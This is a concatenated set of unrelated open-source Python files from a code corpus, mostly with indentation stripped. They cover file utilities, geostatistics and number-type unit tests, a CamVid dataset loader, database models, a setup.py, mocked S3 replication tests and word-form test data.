Example: a/b/c/d.txt, num=1 -> c, num=2 -> b, ...
Args:
path: a file path.
num: the number of upper directories.
Returns: the folder name for that level.
"""
for _ in range(num):
path = os.path.dirname(path)
return os.path.basename(path)
def copy_file_to_folder(file_path, dst_dir):
save_path = os.path.join(dst_dir, os.path.basename(file_path))
shutil.copy(file_path, save_path)
def pickle_dump(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f)
f.close()
def pickle_load(path):
with open(path, 'rb') as f:
data = pickle.load(f)
f.close()
return data
def json_dump(data_json, json_save_path):
with open(json_save_path, 'w') as f:
json.dump(data_json, f)
f.close()
def json_load(json_path):
with open(json_path, 'r') as f:
data = json.load(f)
f.close()
return data
def write_str_lines(save_path, lines):
lines = [l + '\n' for l in lines]
with open(save_path, 'w', encoding='utf-8') as f:
f.writelines(lines)
|
skgstat/tests/test_metric_space.py | mmaelicke/scikit-gstat | 141 | 12664616 | import pytest
import numpy as np
import skgstat as skg
import scipy
# produce a random dataset
np.random.seed(42)
rcoords = np.random.gamma(40, 10, size=(500, 2))
np.random.seed(42)
rvals = np.random.normal(10, 4, 500)
def test_invalid_dist_func():
# instantiate metrix space
ms = skg.MetricSpace(rcoords, dist_metric='euclidean')
with pytest.raises(AttributeError) as e:
skg.Variogram(ms, rvals, dist_func='cityblock')
assert 'Distance metric' in e.value
def test_sparse_matrix_no_warning():
# make a really sparse matrix
sparse = skg.MetricSpace(rcoords, max_dist=5)
# call triangular_distance_matrix without warning
V = skg.Variogram(sparse, rvals)
V.triangular_distance_matrix
def test_dense_matrix_warning():
dense = skg.MetricSpace(rcoords)
# check the warning
with pytest.raises(RuntimeWarning) as w:
V = skg.Variogram(dense, rvals)
V.triangular_distance_matrix
assert 'Only available' in w.value
def test_unknown_metric():
with pytest.raises(ValueError) as e:
skg.MetricSpace(rcoords, dist_metric='foobar')
assert 'Unknown Distance Metric:' in e.value
def test_tree_non_euklidean():
with pytest.raises(ValueError) as e:
ms = skg.MetricSpace(rcoords, 'cityblock')
ms.tree
assert 'can only be constructed' in e.value
def test_metric_pair_metrix():
c1 = np.random.gamma(100, 4, (300, 2))
c2 = np.random.gamma(50, 5, (100, 2))
ms1 = skg.MetricSpace(c1, dist_metric='cityblock')
ms2 = skg.MetricSpace(c2, dist_metric='euclidean')
with pytest.raises(ValueError) as e:
skg.MetricSpacePair(ms1, ms2)
assert 'same distance metric' in e.value
def test_metric_pair_max_dist():
c1 = np.random.gamma(100, 4, (300, 2))
c2 = np.random.gamma(50, 5, (100, 2))
ms1 = skg.MetricSpace(c1, max_dist=50)
ms2 = skg.MetricSpace(c2, max_dist=400)
with pytest.raises(ValueError) as e:
skg.MetricSpacePair(ms1, ms2)
assert 'same max_dist' in e.value
def test_raster_metric():
# Generate a gridded dataset
shape = (100, 100)
np.random.seed(42)
vals = np.random.normal(0, 1, size=shape)
# Coordinates
x = np.arange(0, shape[0])
y = np.arange(0, shape[1])
xx, yy = np.meshgrid(x, y)
# Flatten everything because we don't care about the 2D at this point
coords = np.dstack((xx.flatten(), yy.flatten())).squeeze()
vals = vals.flatten()
# Run the computation
rems = skg.RasterEquidistantMetricSpace(coords, shape=shape, extent=(x[0],x[-1],y[0],y[-1]), samples=10, runs=10,
rnd=42, verbose=True)
# Minimal check of the output
assert rems.max_dist == pytest.approx(140,rel=0.01)
assert rems.res == pytest.approx(1, rel=0.0001)
assert isinstance(rems.dists, scipy.sparse.csr.csr_matrix)
assert rems.dists.shape == (10000, 10000)
# Check the random state provides the same final center
assert all(rems._centers[-1] == np.array([62, 52]))
# Check the interface with a Variogram object works
V = skg.Variogram(rems, vals)
assert V.bin_count is not None
# Check the variogram is always the same with the random state given
assert V.experimental[0] == pytest.approx(0.89,0.01)
# Check that the routines are robust to very few data points in the grid (e.g., from nodata values)
coords_sub = coords[0::1000]
vals_sub = vals[0::1000]
rems_sub = skg.RasterEquidistantMetricSpace(coords_sub, shape=shape, extent=(x[0],x[-1],y[0],y[-1]), samples=100, runs=10,
rnd=42)
V = skg.Variogram(rems_sub, vals_sub)
# Check with a single isolated point possibly being used as center
coords_sub = np.concatenate(([coords[0]], coords[-10:]))
vals_sub = np.concatenate(([vals[0]], vals[-10:]))
rems_sub = skg.RasterEquidistantMetricSpace(coords_sub, shape=shape, extent=(x[0],x[-1],y[0],y[-1]), samples=100, runs=11,
rnd=42)
V = skg.Variogram(rems_sub, vals_sub)
|
tensorpack/dataflow/dataset/camvid.py | Bhaskers-Blu-Org2/petridishnn | 121 | 12664620 | from ..base import RNGDataFlow
from ...utils import logger,fs
import os
import numpy as np
def load_data_from_npzs(fnames):
if not isinstance(fnames, list):
fnames = [fnames]
Xs = []
Ys = []
for fname in fnames:
d = np.load(fname)
logger.info('Loading from {}'.format(fname))
X, Y = (d['X'], d['Y'])
Xs.append(X)
Ys.append(Y)
    return np.concatenate(Xs), np.concatenate(Ys)
class Camvid(RNGDataFlow):
name = 'camvid'
non_void_nclasses = 11
_void_labels = [11]
# optional arguments
data_shape = (360, 480, 3)
mean = [0.39068785, 0.40521392, 0.41434407]
std = [0.29652068, 0.30514979, 0.30080369]
_cmap = {
0: (128, 128, 128), # sky
1: (128, 0, 0), # building
2: (192, 192, 128), # column_pole
3: (128, 64, 128), # road
4: (0, 0, 192), # sidewalk
5: (128, 128, 0), # Tree
6: (192, 128, 128), # SignSymbol
7: (64, 64, 128), # Fence
8: (64, 0, 128), # Car
9: (64, 64, 0), # Pedestrian
10: (0, 128, 192), # Bicyclist
11: (0, 0, 0)} # Void
_mask_labels = {0: 'sky', 1: 'building', 2: 'column_pole', 3: 'road',
4: 'sidewalk', 5: 'tree', 6: 'sign', 7: 'fence', 8: 'car',
9: 'pedestrian', 10: 'byciclist', 11: 'void'}
# frequency and weight of each class (including void)
class_freq = np.array([ 0.16845114, 0.23258652, 0.00982927, 0.31658215, 0.0448627,
0.09724055, 0.01172954, 0.01126809, 0.05865686, 0.00639231, 0.00291665, 0.03948423])
class_weight = sorted(class_freq)[len(class_freq)//2] / class_freq
#class_weight = np.array([ 0.49470329, 0.35828961, 8.47807568, 0.26322815,
# 1.8575192 , 0.85698135, 7.10457224, 7.39551774,
# 1.42069214, 13.03649617, 28.57158304, 2.11054735])
def __init__(self, which_set, shuffle=True, pixel_z_normalize=True, data_dir=None,
is_label_one_hot=False,
slide_all=False, slide_window_size=224, void_overlap=False):
"""
which_set : one of train, val, test, trainval
shuffle:
data_dir: <data_dir> should contain train.npz, val.npz, test.npz
"""
self.shuffle = shuffle
self.pixel_z_normalize = pixel_z_normalize
self.is_label_one_hot = is_label_one_hot
self.void_overlap = void_overlap
if data_dir is None:
data_dir = fs.get_dataset_path('camvid')
assert os.path.exists(data_dir)
for set_name in ['train', 'val', 'test']:
assert os.path.exists(os.path.join(data_dir, '{}.npz'.format(set_name)))
assert which_set in ['train', 'val', 'test', 'trainval'],which_set
if which_set == 'train':
load_fns = ['train']
elif which_set == 'val':
load_fns = ['val']
elif which_set == 'test':
load_fns = ['test']
else: #if which_set == 'trainval':
load_fns = ['train', 'val']
# These npz are assumed to have NHWC format for image, and NHW for label
load_fns = map(lambda fn : os.path.join(data_dir, '{}.npz'.format(fn)), load_fns)
self.X, self.Y = load_data_from_npzs(load_fns)
assert self.X.dtype == 'uint8'
self.slide_window_size = slide_window_size
self.slide_all = slide_all
self.slide_all_size =None
def get_data(self):
idxs = np.arange(len(self.X))
if self.shuffle:
self.rng.shuffle(idxs)
for k in idxs:
X = np.asarray(self.X[k], dtype=np.float32) / 255.0
Y = self.Y[k]
H,W = (X.shape[0], X.shape[1])
void = Camvid._void_labels[0]
if self.is_label_one_hot:
K = Camvid.non_void_nclasses
Y_tmp = np.zeros((H,W,K),dtype=np.float32)
mask = (Y.reshape([-1]) < K)
Y_tmp.reshape([-1,K])[np.arange(H*W)[mask], Y.reshape([-1])[mask]] = 1.0
Y = Y_tmp
void = np.zeros(K)
if self.pixel_z_normalize:
X = (X - Camvid.mean) / Camvid.std
if not self.slide_all:
# do not slide all windows
yield [X, Y]
else:
# slide all windows
side = self.slide_window_size
n_h = H // side + int(H % side != 0)
n_w = W // side + int(W % side != 0)
for hi in range(n_h):
h_overlap = 0
row = hi*side
row_end = row+side
if row_end > H:
if self.void_overlap:
h_overlap = row - (H-side)
row = H - side
row_end = H
for wi in range(n_w):
w_overlap = 0
col = wi*side
col_end = col+side
if col_end > W:
if self.void_overlap:
w_overlap = col - (W-side)
col = W - side
col_end = W
Xrc = X[row:row_end, col:col_end]
Yrc = Y[row:row_end, col:col_end].copy()
if h_overlap > 0:
Yrc[:h_overlap, :] = void
if w_overlap > 0:
Yrc[:, :w_overlap] = void
yield [Xrc, Yrc]
def size(self):
if not self.slide_all:
return len(self.X)
if self.slide_all_size is None:
H, W = self.X.shape[1], self.X.shape[2]
side = self.slide_window_size
n_h = H // side + int(H % side !=0)
n_w = W // side + int(W % side !=0)
self.slide_all_size = n_h * n_w * len(self.X)
return self.slide_all_size
def stitch_sliding_images(self, l_imgs):
"""
The l_imgs should be probability distribution of labels.
"""
side = self.slide_window_size
H,W = (Camvid.data_shape[0], Camvid.data_shape[1])
n_h = H // side + int(H % side != 0)
n_w = W // side + int(W % side != 0)
assert n_h * n_w == len(l_imgs), len(l_imgs)
        n_ch = len(l_imgs[0].reshape([-1])) // side ** 2
assert n_ch > 1, n_ch
image = np.zeros((H, W, n_ch))
i = -1
for hi in range(n_h):
row = hi * side
row_end = row+side
if row_end > H:
row_end = H
row = H - side
for wi in range(n_w):
col = wi*side
col_end = col+side
if col_end > W:
col_end = W
col = W - side
i+=1
r_ = row_end - row
c_ = col_end - col
window = l_imgs[i].reshape([side, side, n_ch])
image[row:row_end, col:col_end] += window
return image
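# Usage sketch (illustrative; ``predict`` stands in for any model that returns
# per-pixel class probabilities for one 224x224 window and is an assumption):
#
#     ds = Camvid('val', shuffle=False, slide_all=True, void_overlap=True)
#     ds.reset_state()
#     windows = [predict(X) for X, _ in ds.get_data()]
#     per_image = ds.size() // len(ds.X)            # number of windows per image
#     prob_map = ds.stitch_sliding_images(windows[:per_image])   # H x W x K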
|
server/app/services/publish/models.py | goodfree/ActorCloud | 173 | 12664627 | <reponame>goodfree/ActorCloud
from sqlalchemy import func
from sqlalchemy.dialects.postgresql import JSONB
from actor_libs.database.orm import BaseModel, db, ModelMixin
__all__ = ['PublishLog', 'TimerPublish']
class PublishLog(ModelMixin, db.Model):
"""
controlType: 1:Publish,2:Read,3:Write,4 Execute
publishStatus: 0:Failed,1:Published 2:Arrived
"""
__tablename__ = 'publish_logs'
__table_args__ = (
db.Index('publish_logs_msgTime_idx', "msgTime"),
)
topic = db.Column(db.String(1000)) # mqtt topic
streamID = db.Column(db.String(1000)) # stream id
payload = db.Column(JSONB) # publish payload
publishStatus = db.Column(db.SmallInteger)
taskID = db.Column(db.String(64))
msgTime = db.Column(db.DateTime, server_default=func.now(), primary_key=True)
deviceID = db.Column(db.String, primary_key=True) # device uid
tenantID = db.Column(db.String, primary_key=True) # tenant uid
class TimerPublish(BaseModel):
__tablename__ = 'timer_publish'
    taskName = db.Column(db.String)  # task name
    taskStatus = db.Column(db.SmallInteger, server_default='2')  # task status: 2 running, 3 succeeded
    timerType = db.Column(db.SmallInteger)  # timer type: 1 fixed time, 2 interval
    topic = db.Column(db.String(1000))  # topic (MQTT)
    payload = db.Column(JSONB)  # publish payload
    intervalTime = db.Column(JSONB)  # interval time {'weekday': 'hour': 'minute'}
    crontabTime = db.Column(db.DateTime)  # scheduled publish time
    deviceIntID = db.Column(db.Integer, db.ForeignKey(
        'devices.id', onupdate="CASCADE", ondelete="CASCADE"))  # device id
    userIntID = db.Column(db.Integer, db.ForeignKey(
        'users.id', onupdate="CASCADE", ondelete="CASCADE"))  # user id
|
setup.py | freemansw1/trackpy | 315 | 12664645 | <gh_stars>100-1000
import os
import versioneer
from setuptools import setup
try:
descr = open(os.path.join(os.path.dirname(__file__), 'README.md')).read()
except OSError:
descr = ''
# In some cases, the numpy include path is not present by default.
# Let's try to obtain it.
try:
import numpy
except ImportError:
ext_include_dirs = []
else:
ext_include_dirs = [numpy.get_include(),]
setup_parameters = dict(
name = "trackpy",
version = versioneer.get_version(),
cmdclass = versioneer.get_cmdclass(),
description = "particle-tracking toolkit",
author = "Trackpy Contributors",
author_email = "<EMAIL>",
url = "https://github.com/soft-matter/trackpy",
install_requires = ['numpy>=1.14', 'scipy>=1.1', 'pandas>=0.22', 'pyyaml', 'matplotlib'],
python_requires=">=3.6",
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
packages = ['trackpy', 'trackpy.refine', 'trackpy.linking', 'trackpy.locate_functions'],
long_description = descr,
long_description_content_type='text/markdown'
)
setup(**setup_parameters)
|
descarteslabs/workflows/types/primitives/tests/test_number.py | descarteslabs/descarteslabs-python | 167 | 12664652 | import operator
import pytest
import numpy as np
from ...core import ProxyTypeError
from ...containers import Tuple, List
from ...identifier import parameter
from ..bool_ import Bool
from ..string import Str
from ..number import Float, Int, Number, _binop_result
from ...core.tests.utils import operator_test
class TestPromote(object):
def test_number_unpromotable(self):
with pytest.raises(ProxyTypeError):
Number._promote(2.2)
with pytest.raises(ProxyTypeError):
Number._promote(0)
def test_primitives(self):
assert isinstance(Int._promote(0), Int)
assert isinstance(Float._promote(2), Float)
assert isinstance(Float._promote(2.2), Float)
def test_proxytypes(self):
assert isinstance(Int._promote(Int(0)), Int)
assert isinstance(Float._promote(Float(2.2)), Float)
def test_wrong_primitives(self):
with pytest.raises(ProxyTypeError):
Int._promote(2.2)
def test_wrong_proxytypes(self):
with pytest.raises(
ProxyTypeError, match=r"You need to convert it explicitly, like `Int\(x\)`"
):
Int._promote(Float(2.2))
with pytest.raises(
ProxyTypeError,
match=r"You need to convert it explicitly, like `Float\(x\)`",
):
Float._promote(Int(0))
class TestConstruct(object):
def test_explicit_cast_passthrough(self):
i = Int(Int(1))
assert i.graft[i.graft["returns"]] == 1
assert i.params == ()
x = parameter("x", Int)
i = Int(x)
assert i.params == (x,)
def test_explicit_cast_to_int(self):
i = Int(Float(1.0))
assert isinstance(i, Int)
assert i.graft[i.graft["returns"]][0] == "wf.Int.cast"
assert i.params == ()
x = parameter("x", Float)
i = Int(x)
assert i.params == (x,)
i = Int(Bool(True))
assert isinstance(i, Int)
assert i.graft[i.graft["returns"]][0] == "wf.Int.cast"
assert i.params == ()
x = parameter("x", Bool)
i = Int(x)
assert i.params == (x,)
i = Int(Str("1"))
assert isinstance(i, Int)
assert i.graft[i.graft["returns"]][0] == "wf.Int.cast"
assert i.params == ()
x = parameter("x", Str)
i = Int(x)
assert i.params == (x,)
def test_explicit_cast_to_float(self):
f = Float(Int(1))
assert isinstance(f, Float)
assert f.graft[f.graft["returns"]][0] == "wf.Float.cast"
assert f.params == ()
x = parameter("x", Int)
f = Float(x)
assert f.params == (x,)
f = Float(Bool(True))
assert isinstance(f, Float)
assert f.graft[f.graft["returns"]][0] == "wf.Float.cast"
assert f.params == ()
x = parameter("x", Bool)
f = Float(x)
assert f.params == (x,)
f = Float(Str("1"))
assert isinstance(f, Float)
assert f.graft[f.graft["returns"]][0] == "wf.Float.cast"
assert f.params == ()
x = parameter("x", Str)
f = Float(x)
assert f.params == (x,)
class TestNumPyScalars(object):
@pytest.mark.parametrize(
"val",
[
np.uint8(1),
np.uint16(1),
np.uint32(1),
np.uint64(1),
np.int8(1),
np.int16(1),
np.int32(1),
np.int64(1),
],
)
def test_int(self, val):
i = Int(val)
assert isinstance(i.graft[i.graft["returns"]], int)
assert i.params == ()
@pytest.mark.parametrize("val", [np.float16(1), np.float32(1), np.float64(1)])
def test_float(self, val):
i = Float(val)
assert isinstance(i.graft[i.graft["returns"]], float)
assert i.params == ()
def test_failure(self):
with pytest.raises(TypeError):
Float(np.int32(1))
with pytest.raises(TypeError):
Int(np.float64(1))
with pytest.raises(TypeError):
Int(np.datetime64("2020-01-01"))
@pytest.mark.parametrize(
"a, b, expected",
[
(Int(0), Int(0), Int),
(Float(0.0), Float(0.0), Float),
(Int(0), Float(0.0), Float),
(Float(0.0), Int(0), Float),
],
)
def test_binop_result(a, b, expected):
assert _binop_result(a, b) == expected
class TestAllOperators(object):
int_obj = Int(0)
float_obj = Float(0.0)
all_values_to_try = [Int(1), Float(2.2), Bool(True), List[Int]([1, 2])]
# ^ we use pre-promoted Proxytypes, not py types, since the `operator_test`
# helper checks if `type(value) is in accepted_types`
@pytest.mark.parametrize(
"operator, accepted_types, return_type",
[
["__abs__", (), Int],
["__add__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__div__", (Int, Float, Bool), (Int, Float)],
[
"__divmod__",
(Int, Float, Bool),
{
Float: Tuple[Float, Float],
Int: Tuple[Int, Int],
Bool: Tuple[Int, Int],
},
],
["__eq__", (Int, Float, Bool), Bool],
["__floordiv__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__ge__", (Int, Float, Bool), Bool],
["__gt__", (Int, Float, Bool), Bool],
["__invert__", (), Int],
["__le__", (Int, Float, Bool), Bool],
["__lt__", (Int, Float, Bool), Bool],
["__mod__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__mul__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__ne__", (Int, Float, Bool), Bool],
["__neg__", (), Int],
["__pos__", (), Int],
["__pow__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__radd__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rdiv__", (Int, Float, Bool), (Int, Float)],
[
"__rdivmod__",
(Int, Float, Bool),
{
Float: Tuple[Float, Float],
Int: Tuple[Int, Int],
Bool: Tuple[Int, Int],
},
],
["__rfloordiv__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rmod__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rmul__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rpow__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rsub__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rtruediv__", (Int, Float, Bool), (Int, Float)],
["__sub__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__truediv__", (Int, Float, Bool), (Int, Float)],
# Int-specific methods
["__and__", [Int, Bool], Int],
["__lshift__", [Int, Bool], Int],
["__or__", [Int, Bool], Int],
["__rand__", [Int, Bool], Int],
["__rlshift__", [Int, Bool], Int],
["__ror__", [Int, Bool], Int],
["__rrshift__", [Int, Bool], Int],
["__rshift__", [Int, Bool], Int],
["__rxor__", [Int, Bool], Int],
["__xor__", [Int, Bool], Int],
],
)
def test_all_operators_int(self, operator, accepted_types, return_type):
operator_test(
self.int_obj, self.all_values_to_try, operator, accepted_types, return_type
)
@pytest.mark.parametrize(
"operator, accepted_types, return_type",
[
["__abs__", (), Float],
["__add__", (Int, Float, Bool), Float],
["__div__", (Int, Float, Bool), Float],
["__divmod__", (Int, Float, Bool), Tuple[Float, Float]],
["__eq__", (Int, Float, Bool), Bool],
["__floordiv__", (Int, Float, Bool), Float],
["__ge__", (Int, Float, Bool), Bool],
["__gt__", (Int, Float, Bool), Bool],
["__invert__", (), Float],
["__le__", (Int, Float, Bool), Bool],
["__lt__", (Int, Float, Bool), Bool],
["__mod__", (Int, Float, Bool), Float],
["__mul__", (Int, Float, Bool), Float],
["__ne__", (Int, Float, Bool), Bool],
["__neg__", (), Float],
["__pos__", (), Float],
["__pow__", (Int, Float, Bool), Float],
["__radd__", (Int, Float, Bool), Float],
["__rdiv__", (Int, Float, Bool), Float],
["__rdivmod__", (Int, Float, Bool), Tuple[Float, Float]],
["__rfloordiv__", (Int, Float, Bool), Float],
["__rmod__", (Int, Float, Bool), Float],
["__rmul__", (Int, Float, Bool), Float],
["__rpow__", (Int, Float, Bool), Float],
["__rsub__", (Int, Float, Bool), Float],
["__rtruediv__", (Int, Float, Bool), Float],
["__sub__", (Int, Float, Bool), Float],
["__truediv__", (Int, Float, Bool), Float],
],
)
def test_all_operators_float(self, operator, accepted_types, return_type):
operator_test(
self.float_obj,
self.all_values_to_try,
operator,
accepted_types,
return_type,
)
@pytest.mark.parametrize("obj", [Int(0), Float(2.2)])
@pytest.mark.parametrize(
"op, exception",
[(operator.truth, TypeError), (operator.index, TypeError), (hex, TypeError)],
)
def test_unsupported_unary_methods(self, obj, op, exception):
with pytest.raises(exception):
op(obj)
|
keras_image_captioning/word_vectors_test.py | ashishpatel26/keras-image-captioning | 116 | 12664655 | <filename>keras_image_captioning/word_vectors_test.py
import pytest
from .preprocessors import CaptionPreprocessor
from .word_vectors import Glove, Fasttext
class WordVectorTestBase(object):
_WORD_VECTOR = None
@pytest.fixture
def word_vector(self, mocker):
mocker.patch.object(self._WORD_VECTOR, '_PRETRAINED_PATH',
self._WORD_VECTOR._PRETRAINED_PATH + '.sample')
vocab_words = ['.', 'znotexistz', 'a', 'i']
initializer = 'zeros'
word_vector = self._WORD_VECTOR(vocab_words=vocab_words,
initializer=initializer)
return word_vector
def test___init__(self, word_vector):
EOS_TOKEN = CaptionPreprocessor.EOS_TOKEN
word_vector_of = word_vector._word_vector_of
assert len(word_vector_of) == 3 # Not including znotexistz
assert '.' not in word_vector_of
assert 'znotexistz' not in word_vector_of
assert EOS_TOKEN in word_vector_of
assert 'a' in word_vector_of
assert 'i' in word_vector_of
def test_vectorize_words(self, word_vector):
EOS_TOKEN = CaptionPreprocessor.EOS_TOKEN
vectors = word_vector.vectorize_words(['qnotexistq', 'znotexistz', EOS_TOKEN,
'a'])
assert not vectors[:2].any() # Assert all zeros
assert vectors[2:].all() # Assert all non-zeros
class TestGlove(WordVectorTestBase):
_WORD_VECTOR = Glove
class TestFasttext(WordVectorTestBase):
_WORD_VECTOR = Fasttext
|
tests/test_s3/test_s3_replication.py | gtourkas/moto | 5,460 | 12664666 | <filename>tests/test_s3/test_s3_replication.py
import boto3
import pytest
import sure # noqa # pylint: disable=unused-import
from botocore.exceptions import ClientError
from moto import mock_s3
from uuid import uuid4
DEFAULT_REGION_NAME = "us-east-1"
@mock_s3
def test_get_bucket_replication_for_unexisting_bucket():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
with pytest.raises(ClientError) as exc:
s3.get_bucket_replication(Bucket=bucket_name)
err = exc.value.response["Error"]
err["Code"].should.equal("NoSuchBucket")
err["Message"].should.equal("The specified bucket does not exist")
err["BucketName"].should.equal(bucket_name)
@mock_s3
def test_get_bucket_replication_bucket_without_replication():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
s3.create_bucket(Bucket=bucket_name)
with pytest.raises(ClientError) as exc:
s3.get_bucket_replication(Bucket=bucket_name)
err = exc.value.response["Error"]
err["Code"].should.equal("ReplicationConfigurationNotFoundError")
err["Message"].should.equal("The replication configuration was not found")
err["BucketName"].should.equal(bucket_name)
@mock_s3
def test_delete_bucket_replication_unknown_bucket():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
with pytest.raises(ClientError) as exc:
s3.delete_bucket_replication(Bucket=bucket_name)
err = exc.value.response["Error"]
err["Code"].should.equal("NoSuchBucket")
err["Message"].should.equal("The specified bucket does not exist")
err["BucketName"].should.equal(bucket_name)
@mock_s3
def test_delete_bucket_replication_bucket_without_replication():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
s3.create_bucket(Bucket=bucket_name)
# No-op
s3.delete_bucket_replication(Bucket=bucket_name)
@mock_s3
def test_create_replication_without_versioning():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
s3.create_bucket(Bucket=bucket_name)
with pytest.raises(ClientError) as exc:
s3.put_bucket_replication(
Bucket=bucket_name,
ReplicationConfiguration={
"Role": "myrole",
"Rules": [
{"Destination": {"Bucket": "secondbucket"}, "Status": "Enabled"}
],
},
)
err = exc.value.response["Error"]
err["Code"].should.equal("InvalidRequest")
err["Message"].should.equal(
"Versioning must be 'Enabled' on the bucket to apply a replication configuration"
)
err["BucketName"].should.equal(bucket_name)
@mock_s3
def test_create_and_retrieve_replication_with_single_rules():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
s3.create_bucket(Bucket=bucket_name)
s3.put_bucket_versioning(
Bucket=bucket_name, VersioningConfiguration={"Status": "Enabled"}
)
s3.put_bucket_replication(
Bucket=bucket_name,
ReplicationConfiguration={
"Role": "myrole",
"Rules": [
{
"ID": "firstrule",
"Priority": 2,
"Destination": {"Bucket": "secondbucket"},
"Status": "Enabled",
}
],
},
)
config = s3.get_bucket_replication(Bucket=bucket_name)["ReplicationConfiguration"]
config.should.equal(
{
"Role": "myrole",
"Rules": [
{
"DeleteMarkerReplication": {"Status": "Disabled"},
"Destination": {"Bucket": "secondbucket"},
"Filter": {"Prefix": ""},
"ID": "firstrule",
"Priority": 2,
"Status": "Enabled",
}
],
}
)
s3.delete_bucket_replication(Bucket=bucket_name)
# Can't retrieve replication that has been deleted
with pytest.raises(ClientError) as exc:
s3.get_bucket_replication(Bucket=bucket_name)
err = exc.value.response["Error"]
err["Code"].should.equal("ReplicationConfigurationNotFoundError")
err["Message"].should.equal("The replication configuration was not found")
err["BucketName"].should.equal(bucket_name)
@mock_s3
def test_create_and_retrieve_replication_with_multiple_rules():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
s3.create_bucket(Bucket=bucket_name)
s3.put_bucket_versioning(
Bucket=bucket_name, VersioningConfiguration={"Status": "Enabled"}
)
s3.put_bucket_replication(
Bucket=bucket_name,
ReplicationConfiguration={
"Role": "myrole",
"Rules": [
{"Destination": {"Bucket": "secondbucket"}, "Status": "Enabled"},
{
"ID": "secondrule",
"Priority": 2,
"Destination": {"Bucket": "thirdbucket"},
"Status": "Disabled",
},
],
},
)
config = s3.get_bucket_replication(Bucket=bucket_name)["ReplicationConfiguration"]
config.should.have.key("Role").equal("myrole")
rules = config["Rules"]
rules.should.have.length_of(2)
first_rule = rules[0]
first_rule.should.have.key("ID")
first_rule.should.have.key("Priority").equal(1)
first_rule.should.have.key("Status").equal("Enabled")
first_rule.should.have.key("Destination").equal({"Bucket": "secondbucket"})
second = rules[1]
second.should.have.key("ID").equal("secondrule")
second.should.have.key("Priority").equal(2)
second.should.have.key("Status").equal("Disabled")
second.should.have.key("Destination").equal({"Bucket": "thirdbucket"})
|
deps/npm/node_modules/node-gyp/gyp/test/gyp-defines/gyptest-regyp.py | loganfsmyth/node | 140 | 12664675 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that when the same value is repeated for a gyp define, duplicates are
stripped from the regeneration rule.
"""
import os
import TestGyp
# Regenerating build files when a gyp file changes is currently only supported
# by the make and Android generators.
test = TestGyp.TestGyp(formats=['make', 'android'])
os.environ['GYP_DEFINES'] = 'key=repeated_value key=value1 key=repeated_value'
test.run_gyp('defines.gyp')
test.build('defines.gyp')
# The last occurrence of a repeated set should take precedence over other
# values. See gyptest-multiple-values.py.
test.must_contain('action.txt', 'repeated_value')
# So the regeneration rule needs to use the correct order.
test.must_not_contain(
'Makefile', '"-Dkey=repeated_value" "-Dkey=value1" "-Dkey=repeated_value"')
test.must_contain('Makefile', '"-Dkey=value1" "-Dkey=repeated_value"')
# Sleep so that the changed gyp file will have a newer timestamp than the
# previously generated build files.
test.sleep()
os.utime("defines.gyp", None)
test.build('defines.gyp')
test.must_contain('action.txt', 'repeated_value')
test.pass_test()
|
blogs/tests/test_models.py | ewjoachim/pythondotorg | 911 | 12664688 | from django.test import TestCase
from django.utils import timezone
from ..models import BlogEntry, Feed
class BlogModelTest(TestCase):
def test_blog_entry(self):
now = timezone.now()
b = BlogEntry.objects.create(
title='Test Entry',
summary='Test Summary',
pub_date=now,
url='http://www.revsys.com',
feed=Feed.objects.create(
name='psf blog',
website_url='psf.example.org',
feed_url='feed.psf.example.org',
)
)
self.assertEqual(str(b), b.title)
self.assertEqual(b.get_absolute_url(), b.url)
|
test_values.py | tomaarsen/word_forms | 570 | 12664719 | # Test values must be in the form [(text_input, expected_output), (text_input, expected_output), ...]
test_values = [
(
"president",
{
"n": {
"president",
"presidentship",
"presidencies",
"presidency",
"presidentships",
"presidents",
},
"r": {"presidentially"},
"a": {"presidential"},
"v": {"presiding", "presides", "preside", "presided"},
},
),
(
"elect",
{
"n": {
"elector",
"elects",
"electors",
"elective",
"electorates",
"elect",
"electives",
"elections",
"electorate",
"eligibility",
"election",
"eligibilities",
},
"r": set(),
"a": {"elect", "electoral", "elective", "eligible"},
"v": {"elect", "elects", "electing", "elected"},
},
),
(
"running",
{
"n": {
"runninesses",
"runnings",
"runs",
"running",
"runniness",
"runners",
"runner",
"run",
},
"a": {"running", "runny"},
"v": {"running", "ran", "runs", "run"},
"r": set(),
},
),
(
"run",
{
"n": {
"runninesses",
"runnings",
"runs",
"running",
"runniness",
"runners",
"runner",
"run",
},
"a": {"running", "runny"},
"v": {"running", "ran", "runs", "run"},
"r": set(),
},
),
(
"operations",
{
"n": {
"operators",
"operations",
"operation",
"operative",
"operator",
"operatives",
},
"a": {"operant", "operative"},
"v": {"operated", "operating", "operate", "operates"},
"r": {"operatively"},
},
),
(
"operate",
{
"n": {
"operators",
"operations",
"operation",
"operative",
"operator",
"operatives",
},
"a": {"operant", "operative"},
"v": {"operated", "operating", "operate", "operates"},
